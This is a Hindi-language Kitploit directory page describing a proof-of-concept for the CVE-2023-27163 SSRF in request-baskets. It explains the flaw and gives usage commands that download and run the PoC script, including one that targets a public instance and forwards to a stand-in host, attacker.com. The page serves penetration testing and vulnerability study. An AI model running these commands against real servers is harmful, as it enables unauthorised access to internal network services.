Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27163 — Proof-of-Concept के लिए Server Side Request Forgery (SSRF) में request-baskets (<= v.1.2.1) | Kitploit
उपकरण/GitHubGitHub/entr0pie/cve-2023-27163
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

Proof-of-Concept के लिए Server Side Request Forgery (SSRF) में request-baskets (<= v.1.2.1)

रिपॉजिटरी देखें
3153 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Request-Baskets पर SSRF का PoC (CVE-2023-27163)

इस रिपॉजिटरी में CVE-2023-27163 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शामिल है, जो request-baskets में संस्करण 1.2.1 तक पाई गई एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) कमजोरी है। यह कमजोरी हमलावरों को एक क्राफ्टेड API अनुरोध के माध्यम से /api/baskets/{name} घटक का शोषण करके नेटवर्क संसाधनों और संवेदनशील जानकारी तक पहुंचने की अनुमति देती है।

श्रेय @b33t1e, @chelinboo147 और @houqinsheng को (देखें लेख)।

उपयोग

root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

यह कैसे काम करता है?

Request-baskets एक वेब एप्लिकेशन है जो एक विशिष्ट मार्ग पर अनुरोधों को एकत्र और पंजीकृत करने के लिए बनाया गया है, जिसे बास्केट कहा जाता है। इसे बनाते समय, उपयोगकर्ता अनुरोध को अग्रेषित करने के लिए किसी अन्य सर्वर को निर्दिष्ट कर सकता है। यहां समस्या यह है कि उपयोगकर्ता अनपेक्षित सेवाओं, जैसे नेटवर्क-बंद एप्लिकेशन, को निर्दिष्ट कर सकता है।

उदाहरण के लिए: मान लीजिए कि सर्वर Request-baskets (पोर्ट 55555) और पोर्ट 8000 पर एक Flask वेब सर्वर होस्ट करता है। Flask केवल localhost के साथ इंटरैक्ट करने के लिए कॉन्फ़िगर किया गया है। http://localhost:8000 पर अग्रेषित करने वाली एक बास्केट बनाकर, हमलावर पहले से प्रतिबंधित Flask वेब सर्वर तक पहुंच सकता है।

लोकलहोस्ट में परीक्षण

PoC छवि

  1. Request-Baskets का Docker कंटेनर शुरू करें
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. PoC डाउनलोड करें
root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. कनेक्शन की प्रतीक्षा करें
root@kitploit:~
nc -lvp 8000
  1. Docker होस्ट का IP पता सहेजें
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. PoC चलाएँ
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

लाइसेंस

यह परियोजना Unlicense के अंतर्गत है।

टूल डाउनलोड करें